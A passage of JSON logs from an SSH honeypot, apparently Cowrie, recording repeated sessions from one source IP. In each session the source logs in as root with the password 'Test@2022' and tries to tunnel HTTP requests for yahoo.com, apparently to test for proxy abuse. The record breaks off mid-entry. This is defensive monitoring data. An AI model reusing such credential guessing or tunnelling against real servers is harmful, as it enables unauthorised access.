{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.366498Z","src_ip":"213.209.150.239","session":"024a5aa7252c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.423068Z","src_ip":"213.209.150.239","session":"024a5aa7252c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.705322Z","src_ip":"213.209.150.239","session":"024a5aa7252c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":23420,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:23420","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.762628Z","session":"024a5aa7252c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.819299Z","src_ip":"213.209.150.239","session":"024a5aa7252c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2246,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2246","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.974955Z","session":"024a5aa7252c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.031876Z","src_ip":"213.209.150.239","session":"024a5aa7252c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.089151Z","src_ip":"213.209.150.239","session":"024a5aa7252c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41240,"dst_ip":"1.2.3.4","dst_port":22,"session":"5155c9e0b53b","protocol":"ssh","message":"New connection: 213.209.150.239:41240 (1.2.3.4:22) [session: 5155c9e0b53b]","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.145044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.145640Z","src_ip":"213.209.150.239","session":"5155c9e0b53b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.202230Z","src_ip":"213.209.150.239","session":"5155c9e0b53b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.483996Z","src_ip":"213.209.150.239","session":"5155c9e0b53b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":9585,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9585","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.541997Z","session":"5155c9e0b53b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.598917Z","src_ip":"213.209.150.239","session":"5155c9e0b53b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29113,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29113","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.754963Z","session":"5155c9e0b53b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.811563Z","src_ip":"213.209.150.239","session":"5155c9e0b53b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.869180Z","src_ip":"213.209.150.239","session":"5155c9e0b53b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41370,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddc3bcee3340","protocol":"ssh","message":"New connection: 213.209.150.239:41370 (1.2.3.4:22) [session: ddc3bcee3340]","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.924851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.925817Z","src_ip":"213.209.150.239","session":"ddc3bcee3340"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:21.982796Z","src_ip":"213.209.150.239","session":"ddc3bcee3340"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.266002Z","src_ip":"213.209.150.239","session":"ddc3bcee3340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":15658,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15658","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.323610Z","session":"ddc3bcee3340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.380356Z","src_ip":"213.209.150.239","session":"ddc3bcee3340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":27843,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27843","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.535012Z","session":"ddc3bcee3340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.591650Z","src_ip":"213.209.150.239","session":"ddc3bcee3340"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.649257Z","src_ip":"213.209.150.239","session":"ddc3bcee3340"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41510,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d36e2b03e98","protocol":"ssh","message":"New connection: 213.209.150.239:41510 (1.2.3.4:22) [session: 3d36e2b03e98]","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.705124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.706462Z","src_ip":"213.209.150.239","session":"3d36e2b03e98"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:22.763261Z","src_ip":"213.209.150.239","session":"3d36e2b03e98"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.046144Z","src_ip":"213.209.150.239","session":"3d36e2b03e98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":3878,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:3878","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.103726Z","session":"3d36e2b03e98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.160588Z","src_ip":"213.209.150.239","session":"3d36e2b03e98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":22377,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:22377","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.315067Z","session":"3d36e2b03e98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.372017Z","src_ip":"213.209.150.239","session":"3d36e2b03e98"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.430958Z","src_ip":"213.209.150.239","session":"3d36e2b03e98"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41570,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0c70e7c6f48","protocol":"ssh","message":"New connection: 213.209.150.239:41570 (1.2.3.4:22) [session: d0c70e7c6f48]","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.476903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.477651Z","src_ip":"213.209.150.239","session":"d0c70e7c6f48"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.524951Z","src_ip":"213.209.150.239","session":"d0c70e7c6f48"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.759566Z","src_ip":"213.209.150.239","session":"d0c70e7c6f48"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":23361,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:23361","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.808057Z","session":"d0c70e7c6f48"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.855297Z","src_ip":"213.209.150.239","session":"d0c70e7c6f48"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6038,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6038","sensor":"my-vps","timestamp":"2025-08-26T01:06:23.993417Z","session":"d0c70e7c6f48"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.040637Z","src_ip":"213.209.150.239","session":"d0c70e7c6f48"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.088382Z","src_ip":"213.209.150.239","session":"d0c70e7c6f48"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41620,"dst_ip":"1.2.3.4","dst_port":22,"session":"b298bcbd68ec","protocol":"ssh","message":"New connection: 213.209.150.239:41620 (1.2.3.4:22) [session: b298bcbd68ec]","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.143892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.144865Z","src_ip":"213.209.150.239","session":"b298bcbd68ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","h